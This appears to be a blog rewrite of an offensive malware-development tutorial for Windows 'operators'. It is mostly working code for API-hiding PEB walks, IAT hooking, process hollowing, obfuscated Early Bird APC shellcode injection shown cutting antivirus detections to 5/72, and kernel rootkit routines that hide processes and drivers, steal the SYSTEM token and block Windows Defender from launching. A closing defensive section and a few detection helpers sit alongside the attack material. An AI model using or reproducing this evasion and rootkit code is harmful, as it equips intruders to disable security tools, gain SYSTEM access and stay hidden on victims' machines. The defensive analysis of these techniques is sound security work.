Malware Development Essentials for Operators: From PEB Walking to Kernel-Mode DKOM

Original English rewrite with full credit. This article is an independent English-language rewrite of “Malware Development Essentials for Operators”, published on f00crew.org (page /0x33). Author not clearly listed on the source page — site handle 0x00, no byline.

All technical content, code samples, ASCII diagrams, and VirusTotal screenshots are the work of the original author. The prose below is rewritten in our own words and trimmed for blog length; short critical code excerpts are kept verbatim for technical fidelity. For the full code listings and every walkthrough step, read the source.

Source: f00crew.org/0x33

Executive Summary

The original article is a long, code-heavy walkthrough of Windows malware development aimed at offensive operators. It starts at the user-mode foundations — resolving Windows APIs by walking the PEB instead of importing them statically, hooking the IAT to redirect calls inside a process — and then layers up through every classic code-injection technique: process hollowing against a legitimate GoogleUpdate.exe, three flavours of DLL injection (path-based, full-binary/reflective, and syscall-level via ntdll), then Early Bird APC injection with AES-256-encrypted shellcode, which the author shows driving VirusTotal detections from 27/72 down to 5/72.

The second half crosses into Ring 0. The author writes a minimal Windows device driver, walks through the IRP dispatch model, builds a kernel-mode DLL injector using PsSetLoadImageNotifyRoutine + kernel APCs (mirroring the Sirefef/ZeroAccess rootkit pattern), and then demonstrates four kernel primitives that any post-exploitation rootkit needs: DKOM process hiding by unlinking from EPROCESS.ActiveProcessLinks, driver hiding by unlinking from LDR_DATA_TABLE_ENTRY.InLoadOrderLinks, SYSTEM token stealing from PsInitialSystemProcess, and kernel callbacks via PsSetCreateProcessNotifyRoutineEx to block security tools like MsMpEng.exe from launching. The kernel snippets hardcode offsets for Windows 10 build 19041+.

PEB Structure

Every analyst-friendly binary betrays itself through its IAT: open it in any PE viewer and the imports tell you what it can do. The author’s first move is to delete that signal. On Windows the Process Environment Block (PEB) is reachable from a thread without importing anything — on x86 via fs:[0x30], on x64 via GS:[0x60] — and from the PEB you can walk InMemoryOrderModuleList to enumerate every loaded module and find its base address. Once you have a module base, you parse its PE export table to resolve any function by name. The two helpers from the article:

size_t GetModHandle(wchar_t *libName) {
    PEB32 *pPEB = (PEB32 *)__readfsdword(0x30);
    PLIST_ENTRY header = &(pPEB->Ldr->InMemoryOrderModuleList);

    for (PLIST_ENTRY curr = header->Flink; curr != header; curr = curr->Flink) {
        LDR_DATA_TABLE_ENTRY32 *data = CONTAINING_RECORD(
            curr, LDR_DATA_TABLE_ENTRY32, InMemoryOrderLinks
        );
        printf("current node: %ls\n", data->BaseDllName.Buffer);
        if (_wcsicmp(libName, data->BaseDllName.Buffer) == 0)
            return data->DllBase;
    }
    return 0;
}
size_t GetFuncAddr(size_t moduleBase, char* szFuncName) {
    PIMAGE_DOS_HEADER dosHdr = (PIMAGE_DOS_HEADER)(moduleBase);
    PIMAGE_NT_HEADERS ntHdr = (PIMAGE_NT_HEADERS)(moduleBase + dosHdr->e_lfanew);
    IMAGE_OPTIONAL_HEADER optHdr = ntHdr->OptionalHeader;
    IMAGE_DATA_DIRECTORY dataDir_exportDir = optHdr.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];

    PIMAGE_EXPORT_DIRECTORY exportTable = (PIMAGE_EXPORT_DIRECTORY)(moduleBase + dataDir_exportDir.VirtualAddress);
    DWORD* arrFuncs = (DWORD *)(moduleBase + exportTable->AddressOfFunctions);
    DWORD* arrNames = (DWORD *)(moduleBase + exportTable->AddressOfNames);
    WORD* arrNameOrds = (WORD *)(moduleBase + exportTable->AddressOfNameOrdinals);

    for (size_t i = 0; i < exportTable->NumberOfNames; i++) {
        char* sz_CurrApiName = (char *)(moduleBase + arrNames[i]);
        WORD num_CurrApiOrdinal = arrNameOrds[i];
        if (!stricmp(sz_CurrApiName, szFuncName)) {
            printf("[+] Found ordinal %.4x - %s\n", num_CurrApiOrdinal, sz_CurrApiName);
            return moduleBase + arrFuncs[ num_CurrApiOrdinal ];
        }
    }
    return 0;
}

Strung together, GetFuncAddr(GetModHandle(L"kernel32.dll"), "WinExec") gets you WinExec("calc") with zero imports visible to static analysis.

Dynamic function loading via IAT hooking

The same PE knowledge used to read exports can be used to rewrite the IAT in your own process — or, with a remote-write primitive, in another. The conceptual diagram from the source:

                    Application                                      mydll
               +-------------------+                           +--------------------+
               |                   |                           |    MessageBoxA     |
               |                   |           +-------------> |--------------------|
               | call MessageBoxA  |      IAT  |               |        ....        |
               |                   |  +-------------------+    |   (user32!MsgBoxA) |
               +-------------------+  |                   |    |        ....        |
                                      |        jmp        +--->+--------------------+
                                      |                   |
                                      +-------------------+

The author’s iatHook walks the import descriptors looking for a target API name and, when it finds the matching IMAGE_THUNK_DATA in FirstThunk, swaps the function pointer for a caller-supplied callback while remembering the original address:

void iatHook(char *module, const char *szHook_ApiName, size_t callback, size_t &apiAddr) {
    auto dir_ImportTable = getNtHdr(module)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT];
    auto impModuleList = (IMAGE_IMPORT_DESCRIPTOR *)&module[dir_ImportTable.VirtualAddress];
    for (; impModuleList->Name; impModuleList++) {
        auto arr_callVia = (IMAGE_THUNK_DATA *)&module[impModuleList->FirstThunk];
        auto arr_apiNames = (IMAGE_THUNK_DATA *)&module[impModuleList->OriginalFirstThunk];
        for (int i = 0; arr_apiNames[i].u1.Function; i++) {
            auto curr_impApi = (PIMAGE_IMPORT_BY_NAME)&module[arr_apiNames[i].u1.Function];
            if (!strcmp(szHook_ApiName, (char *)curr_impApi->Name)) {
                apiAddr = arr_callVia[i].u1.Function;
                arr_callVia[i].u1.Function = callback;
                break;
            }
        }
    }
}

Process hollowing

Hollowing replaces the legitimate image inside a suspended process with your own PE without changing the process name or its parent relationships. The original walkthrough targets GoogleUpdate.exe for plausible cover. The recipe: CreateProcessA with CREATE_SUSPENDED, allocate RWX in the child, copy the PE sections in (mapping each section from its PointerToRawData offset in the file to its VirtualAddress in the new image), update the child’s thread context so RCX (x64) or EAX (x86) holds your entry point and the PEB’s ImageBaseAddress field (at Rdx+0x10 on x64, Ebx+8 on x86) points at your new base, then SetThreadContext and ResumeThread. The core copy and context update are:

WriteProcessMemory(PI.hProcess, pImageBase, Image, NtHeader->OptionalHeader.SizeOfHeaders, NULL);
for (int i = 0; i < NtHeader->FileHeader.NumberOfSections; i++)
    WriteProcessMemory(
        PI.hProcess, 
        LPVOID((size_t)pImageBase + SectionHeader[i].VirtualAddress),
        LPVOID((size_t)Image + SectionHeader[i].PointerToRawData), 
        SectionHeader[i].SizeOfRawData, 
        0
    );

WriteProcessMemory(PI.hProcess, LPVOID(CTX->Rdx + 0x10), LPVOID(&pImageBase), sizeof(PVOID), 0);
CTX->Rcx = (SIZE_T)pImageBase + NtHeader->OptionalHeader.AddressOfEntryPoint;
SetThreadContext(PI.hThread, LPCONTEXT(CTX)); 
ResumeThread(PI.hThread);

DLL injection techniques

The article works through the canonical CreateRemoteThread(LoadLibraryA) dance and its alternatives. The skeleton: OpenProcess with PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, then either (a) write a DLL path into the remote process and have LoadLibraryA load it from disk, or (b) write the entire DLL image and call a reflective loader inside it that maps and relocates itself without ever touching disk. Because kernel32.dll is at the same base in every process on a given boot (ASLR randomises per-boot, not per-process), GetProcAddress(GetModuleHandle("kernel32"), "LoadLibraryA") in the injector also gives you the address in the target.

For execution, CreateRemoteThread is the loud option. The quieter alternative is the undocumented NtCreateThreadEx in ntdll, which the article wraps in a helper, and which sidesteps several EDR hooks aimed specifically at CreateRemoteThread. The author also references the ired.team walkthrough on DLL injection for additional context.

Shellcode execution & obfuscation chain

The article’s shellcode chapter is structured as a detection-reduction experiment. A raw MSFVenom x64/exec payload that spawns notepad.exe, copied into an OpenProcess → VirtualAllocEx → WriteProcessMemory → CreateRemoteThread loader, lands at:

VirusTotal — 27/72 detections on the raw MSFVenom loader. Source: original article.

Step one is moving off the CreateRemoteThread rail and calling the syscall-tier functions directly: NtAllocateVirtualMemory, NtWriteVirtualMemory, NtCreateThreadEx, with the necessary struct definitions (_UNICODE_STRING, _OBJECT_ATTRIBUTES, _PS_ATTRIBUTE, _PS_ATTRIBUTE_LIST) lifted from undocumented.ntinternals.net. Step two is to stop putting plaintext API names and ntdll strings in the binary. A trivial XOR helper does the job:

unsigned char * rox(unsigned char * data, int dataLen, int xor_key) {
    unsigned char * output = (unsigned char *)malloc(sizeof(unsigned char) * dataLen + 1);

    for (int i = 0; i < dataLen; i++)
        output[i] = data[i] ^ xor_key;

    return output;
}

With strings XOR’d and the syscall path replacing the user-mode wrappers, detections drop sharply:

VirusTotal — 9/72 detections after XOR string obfuscation + syscall-tier loader. Source: original article.
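From the analyst's side, single-byte XOR of this kind lowers signature hits but does not survive a targeted look: there are only 256 keys to try. The sketch below is a hypothetical triage helper (the name find_xor_key and its interface are assumptions, not part of the original article) that searches a buffer for a known API name under every single-byte key.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical triage helper, not from the original article.
 * Returns the single-byte key (0..255) under which `needle` becomes
 * visible somewhere in `buf`, or -1 if no key reveals it.
 * Key 0 means the string is present in plaintext. */
int find_xor_key(const unsigned char *buf, size_t len, const char *needle) {
    size_t nlen = strlen(needle);
    if (nlen == 0 || nlen > len)
        return -1;

    for (int key = 0; key < 256; key++) {
        for (size_t off = 0; off + nlen <= len; off++) {
            size_t i = 0;
            /* Decode byte by byte and stop at the first mismatch. */
            while (i < nlen &&
                   (unsigned char)(buf[off + i] ^ key) == (unsigned char)needle[i])
                i++;
            if (i == nlen)
                return key;
        }
    }
    return -1;
}
```

Running it over a sample's data sections with a short list of injection-related API names is a cheap first pass. It says nothing about multi-byte or rolling keys, which need a different approach.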

Step three is the big move: Early Bird APC injection. The author launches a legitimate-looking host (svchost.exe) with CREATE_SUSPENDED, decrypts the AES-256-encrypted shellcode into VirtualAllocEx’d memory inside that process, queues it as a user-mode APC via QueueUserAPC, and resumes the thread. Because the APC fires before ntdll!LdrInitializeThunk finishes wiring up the process, most user-mode security hooks have not been installed yet. The CryptoAPI wrapper used for decryption goes through CryptAcquireContextW(PROV_RSA_AES) → CryptCreateHash(CALG_SHA_256) → CryptHashData → CryptDeriveKey(CALG_AES_256) → CryptDecrypt. The detection floor reaches:

VirusTotal — 5/72 detections after AES-256 + Early Bird APC injection. Source: original article.

The author credits the Early Bird technique to the publicly documented APT33 (Elfin/Refined Kitten) tradecraft.
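Seen from the defender's side, the ordering described above is itself the tell: an APC queued against a process that was created suspended and has not yet been resumed. The sketch below checks a stream of events for that ordering. The event model (ev_kind, proc_event) is hypothetical and stands in for whatever telemetry a sensor actually provides; nothing here is taken from the original article.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical, simplified event model; a real sensor schema will differ. */
typedef enum {
    EV_CREATE_SUSPENDED,  /* process created with CREATE_SUSPENDED */
    EV_QUEUE_APC,         /* user-mode APC queued to a thread in the process */
    EV_RESUME_THREAD,     /* initial thread resumed */
    EV_OTHER
} ev_kind;

typedef struct {
    ev_kind  kind;
    uint32_t target_pid;  /* process the event acts on */
} proc_event;

/* Returns true if an APC is queued against `pid` while that process is
 * still in its initial suspended state (after create, before resume). */
bool looks_like_early_bird(const proc_event *ev, size_t n, uint32_t pid) {
    bool suspended = false;
    for (size_t i = 0; i < n; i++) {
        if (ev[i].target_pid != pid)
            continue;
        switch (ev[i].kind) {
        case EV_CREATE_SUSPENDED: suspended = true;  break;
        case EV_RESUME_THREAD:    suspended = false; break;
        case EV_QUEUE_APC:
            if (suspended)
                return true;
            break;
        default:
            break;
        }
    }
    return false;
}
```

The check is deliberately order-based rather than time-based, so it assumes the events arrive in the order they occurred. A production rule would also want the creating process and the APC target address for context.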

Writing a simple kernel-mode rootkit

Minimal driver and IRP dispatch

A Windows kernel driver has the same skeleton as a console app, except it exports DriverEntry instead of main and talks to user mode through I/O Request Packets (IRPs). The article’s minimal example is two functions and a dispatch-table fill-in:

NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath) {
    DbgPrint("Hello World!");
    return STATUS_SUCCESS;
}

NTSTATUS OnStubDispatch(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp) {
    Irp->IoStatus.Status = STATUS_SUCCESS;
    IoCompleteRequest(Irp, IO_NO_INCREMENT);
    return STATUS_SUCCESS;
}

The driver registers IRP_MJ_CREATE, IRP_MJ_CLOSE, IRP_MJ_DEVICE_CONTROL, IRP_MJ_READ, and IRP_MJ_WRITE to OnStubDispatch (or specialised handlers), creates a device object with IoCreateDevice under \Device\MyDevice, and exposes it to user mode via IoCreateSymbolicLink at \DosDevices\MyDevice. User-mode clients then talk to it through CreateFile(L"\\\\.\\MyDevice", ...) and DeviceIoControl. Loading the compiled driver requires either an EV-signed binary (Secure Boot path) or test-signing mode plus an sc create / sc start on a registry-defined service under HKLM\SYSTEM\CurrentControlSet\Services. The author points at memn0ps’ rootkit notes and the “Windows APT Warfare” book for deeper kernel reading.

Kernel-mode DLL injection (Sirefef-style)

Kernel-mode injection beats user-mode injection because it runs above every user-mode hook and can inject before the target process is fully initialised. The recipe in the article mirrors the Sirefef/ZeroAccess pattern: register a callback with PsSetLoadImageNotifyRoutine, wait for the target process to load KERNEL32.DLL (matched via FsRtlIsNameInExpression(L"*\\KERNEL32.DLL", ...)), resolve LoadLibraryExA in the target’s context, allocate non-paged-pool memory for a KAPC, initialise it with KeInitializeApc, and queue it with KeInsertQueueApc — the target thread executes the APC on its way back to user mode and loads your DLL before its own startup completes.

The injection helper switches into the target’s address space with KeStackAttachProcess, uses ZwAllocateVirtualMemory + RtlCopyMemory (or strcpy) to drop the DLL path, then KeUnstackDetachProcess back to the caller before queueing the APC. Synchronisation between the LoadImageNotifyRoutine callback (called at high IRQL) and the actual injection work is done by deferring to a worker thread on DelayedWorkQueue with ExQueueWorkItem and a NotificationEvent.

Hide process (DKOM)

The most enduring rootkit trick on Windows is also the simplest: the kernel keeps the master list of processes as a doubly-linked list embedded in each EPROCESS at ActiveProcessLinks. Unlink your process node from that list and you vanish from NtQuerySystemInformation, Task Manager, tasklist, and anything else that enumerates the list. The process keeps running because the scheduler indexes threads, not the process list.

Unlinking process B from the ActiveProcessLinks doubly-linked list. Source: original article.

The catch is the offsets: EPROCESS is opaque and version-dependent. The article hardcodes Windows 10 build 19041+ x64 layout:

NTSTATUS HideProcess(ULONG pid) {
    PEPROCESS currentEProcess = PsGetCurrentProcess();
    LIST_ENTRY* currentList = &currentEProcess->ActiveProcessLinks;

    ULONG uniqueProcessIdOffset = 0x2F0;
    ULONG activeProcessLinksOffset = 0x400;

    ULONG currentPid;
    do {
        RtlCopyMemory(&currentPid, (PUCHAR)currentEProcess + uniqueProcessIdOffset, sizeof(currentPid));
        if (currentPid == pid) {
            LIST_ENTRY* blink = currentList->Blink;
            LIST_ENTRY* flink = currentList->Flink;
            blink->Flink = flink;
            flink->Blink = blink;
            return STATUS_SUCCESS;
        }

        currentList = currentList->Flink;
        currentEProcess = CONTAINING_RECORD(currentList, EPROCESS, ActiveProcessLinks);
    } while (currentList != &currentEProcess->ActiveProcessLinks);

    return STATUS_NOT_FOUND;
}

Caveats acknowledged in the source: the routine is not thread-safe as written, and any direct mutation of kernel structures risks PatchGuard tripping a bugcheck. The source names hooking NtQuerySystemInformation to filter its responses as a subtler, harder-to-detect alternative.

Hiding a driver

The driver-module equivalent: the loaded-driver list is reachable from DRIVER_OBJECT.DriverSection (an undocumented PLDR_DATA_TABLE_ENTRY), and unlinking via InLoadOrderLinks makes the driver invisible to lm in WinDbg, systeminfo, and Process Explorer. The author raises IRQL to DISPATCH_LEVEL for the pointer surgery to keep it atomic:

NTSTATUS HideDriver(PDRIVER_OBJECT driverObject) {
    KIRQL irql;
    irql = KeRaiseIrqlToDpcLevel();

    PLDR_DATA_TABLE_ENTRY moduleEntry = (PLDR_DATA_TABLE_ENTRY)driverObject->DriverSection;

    moduleEntry->InLoadOrderLinks.Blink->Flink = moduleEntry->InLoadOrderLinks.Flink;
    moduleEntry->InLoadOrderLinks.Flink->Blink = moduleEntry->InLoadOrderLinks.Blink;

    KeLowerIrql(irql);
    return STATUS_SUCCESS;
}

Token stealing for privilege escalation

Once you have arbitrary kernel writes, the cheapest way from a non-admin process to NT AUTHORITY\SYSTEM is to copy the SYSTEM process token into your own EPROCESS.Token slot. The SYSTEM process is reachable from any kernel driver as the global PsInitialSystemProcess. Walk the ActiveProcessLinks list from there, find the target PID, and replace its token pointer:

NTSTATUS ElevateProcess(ULONG targetPid) {
    ULONG tokenOffset = 0x4B8;
    ULONG uniqueProcessIdOffset = 0x2F0;
    ULONG activeProcessLinksOffset = 0x400;

    PEPROCESS systemProcess = PsInitialSystemProcess;
    PACCESS_TOKEN systemToken = *(PACCESS_TOKEN*)((PUCHAR)systemProcess + tokenOffset);

    PLIST_ENTRY head = (PLIST_ENTRY)((PUCHAR)systemProcess + activeProcessLinksOffset);
    PLIST_ENTRY current = head->Flink;

    while (current != head) {
        PEPROCESS proc = (PEPROCESS)((PUCHAR)current - activeProcessLinksOffset);
        ULONG pid = 0;
        RtlCopyMemory(&pid, (PUCHAR)proc + uniqueProcessIdOffset, sizeof(pid));

        if (pid == targetPid) {
            *(PACCESS_TOKEN*)((PUCHAR)proc + tokenOffset) = systemToken;
            return STATUS_SUCCESS;
        }
        current = current->Flink;
    }
    return STATUS_NOT_FOUND;
}

Production-quality rootkits also have to deal with EX_FAST_REF — the lowest four bits of the token pointer encode a reference count. The article notes the gap and recommends masking before copy; the snippet above is the minimum to make the trick work.
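The same bit layout matters to anyone checking for stolen tokens: two raw token fields can point at the same token object and still differ in their low bits, so a naive equality check misses the match. The sketch below is a detection-side comparison, assuming the x64 layout described above (low four bits are the cached reference count). The function names and the sample values used with it are made up for illustration.

```c
#include <stdbool.h>
#include <stdint.h>

/* On x64 the low 4 bits of an EX_FAST_REF hold a cached reference count;
 * the remaining bits are the object pointer. */
#define FAST_REF_MASK_X64 0xFULL

/* Strip the reference-count bits to recover the object pointer. */
static inline uint64_t fast_ref_object(uint64_t raw) {
    return raw & ~FAST_REF_MASK_X64;
}

/* True if two raw token fields refer to the same token object,
 * regardless of their cached reference counts. */
bool shares_token(uint64_t raw_a, uint64_t raw_b) {
    return fast_ref_object(raw_a) == fast_ref_object(raw_b);
}
```

Given raw token values read from a memory image, shares_token(system_raw, process_raw) returning true for a process that should not be running as SYSTEM is the inconsistency worth flagging.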

Kernel callbacks

The same callback APIs that legitimate EDR products use can be used against them. PsSetCreateProcessNotifyRoutineEx lets a driver inspect each new process before it starts and reject the creation by returning STATUS_ACCESS_DENIED in CreateInfo->CreationStatus. A textbook block on Windows Defender’s MsMpEng.exe:

VOID ProcessNotifyCallback(PEPROCESS Process, HANDLE ProcessId, PPS_CREATE_NOTIFY_INFO CreateInfo) {
    if (CreateInfo != NULL) {
        if (CreateInfo->ImageFileName != NULL) {
            if (wcsstr(CreateInfo->ImageFileName->Buffer, L"MsMpEng.exe")) {
                CreateInfo->CreationStatus = STATUS_ACCESS_DENIED;
            }
        }
    }
}

Companion APIs cover the same surface in other directions: PsSetCreateThreadNotifyRoutine for threads, PsSetLoadImageNotifyRoutine for DLLs/drivers being mapped, ObRegisterCallbacks for handle creation (used by EDRs to gate PROCESS_VM_WRITE), and CmRegisterCallbackEx for registry operations. A rootkit that owns these callbacks owns the host’s observability surface.

Key Takeaways

  • PEB walking + export-table parsing deletes the IAT signal that static analysis depends on. Any binary that needs to be quiet should resolve APIs dynamically.
  • Process hollowing into legitimate hosts (GoogleUpdate.exe, svchost.exe) keeps the process name above suspicion. Update RCX/EAX for entry and the PEB’s ImageBaseAddress field for completeness.
  • Syscall-tier injection via NtAllocateVirtualMemory / NtWriteVirtualMemory / NtCreateThreadEx sidesteps the user-mode hooks aimed at CreateRemoteThread.
  • Early Bird APC + AES-256 shellcode drives the article’s VirusTotal detections from 27/72 to 5/72. The timing matters as much as the crypto — APCs that fire before LdrInitializeThunk run before most user-mode telemetry exists.
  • Kernel-mode DLL injection via PsSetLoadImageNotifyRoutine + APC matches the Sirefef/ZeroAccess pattern and runs above every user-mode hook.
  • DKOM (unlinking from ActiveProcessLinks / InLoadOrderLinks) is cheap, durable, and still effective against tools that enumerate kernel lists — at the cost of fragility against PatchGuard and version-specific offsets.
  • Token stealing from PsInitialSystemProcess is the canonical kernel-exploit payload, but production code must respect the EX_FAST_REF reference-count bits.
  • Kernel callbacks weaponise EDR’s own primitives: a rootkit holding PsSetCreateProcessNotifyRoutineEx can prevent MsMpEng.exe from launching at all.

Defensive Recommendations

  • Don’t rely on static IAT analysis as a signal. Detect dynamic resolution behaviour: API hashing, walks of InMemoryOrderModuleList, manual PE export-table parsing in suspicious processes.
  • Monitor parent/child anomalies on classic hollowing targets: GoogleUpdate.exe, svchost.exe, and any process whose entry-point register is overwritten by SetThreadContext immediately after CREATE_SUSPENDED.
  • Treat syscall-tier ntdll use as a high-signal anomaly. Direct calls to NtAllocateVirtualMemory/NtWriteVirtualMemory/NtCreateThreadEx from non-system processes — especially in cross-process patterns — should alert.
  • Detect Early Bird APCs by watching for QueueUserAPC against a thread in a CREATE_SUSPENDED process before ResumeThread. The pattern is rare in legitimate software.
  • Enforce Driver Signature Enforcement and Hypervisor-protected Code Integrity (HVCI). Most of the kernel half of this article fails to load without test-signing or an EV-signed driver.
  • Periodically reconcile process and module lists. Compare NtQuerySystemInformation results against scheduler-side or memory-scan-based enumerations to catch DKOM’d processes/drivers.
  • Detect token-pointer inconsistencies. A non-SYSTEM process holding the SYSTEM token pointer is a kernel-exploit fingerprint; EDR vendors increasingly check for this directly.
  • Protect the security-tool process tree. Watch for kernel callbacks that fail MsMpEng.exe / EDR sensor startup — the silent-block pattern is itself the signal.
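The list-reconciliation recommendation above comes down to a cross-view diff: take the PIDs the normal enumeration reports, take the PIDs seen through an independent view, and flag anything that appears only in the second. A minimal sketch follows, assuming both snapshots have already been collected as arrays; how they are collected is out of scope, and the function name is hypothetical.

```c
#include <stddef.h>
#include <stdint.h>

/* Writes to `out` every PID that appears in `observed` (independent view)
 * but not in `listed` (normal enumeration). Returns the number written,
 * which never exceeds `out_cap`. Quadratic, which is fine for the few
 * hundred processes on a typical host. */
size_t unlisted_pids(const uint32_t *listed, size_t n_listed,
                     const uint32_t *observed, size_t n_observed,
                     uint32_t *out, size_t out_cap) {
    size_t found = 0;
    for (size_t i = 0; i < n_observed && found < out_cap; i++) {
        int present = 0;
        for (size_t j = 0; j < n_listed; j++) {
            if (listed[j] == observed[i]) {
                present = 1;
                break;
            }
        }
        if (!present)
            out[found++] = observed[i];
    }
    return found;
}
```

The two snapshots are never taken at exactly the same instant, so a process that starts or exits between them will show up as a false positive. Re-checking a flagged PID on the next pass before alerting is a reasonable guard.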

Conclusion

What makes the f00crew piece useful is not any one trick — every individual technique here has its own writeup — but the way they are stacked into a coherent operator pipeline: dynamic API resolution feeds quiet shellcode loading, syscall-tier injection feeds Early Bird APC, the kernel driver feeds DKOM and token stealing, and kernel callbacks finally turn the security stack’s own machinery against it. The detection drops along the way (27/72 → 9/72 → 5/72) are a concrete reminder that on Windows, defence-in-depth has to be behavioural, not signature-based: any single layer can be deleted by a competent loader. Reading the original is well worth your time if you defend Windows estates or build the tools that watch them.

This article is an independent English-language rewrite of «Malware Development Essentials for Operators», originally published on f00crew.org (page /0x33). All code samples, ASCII diagrams, and VirusTotal screenshots are the work of the original author. Please cite f00crew when referencing this material.
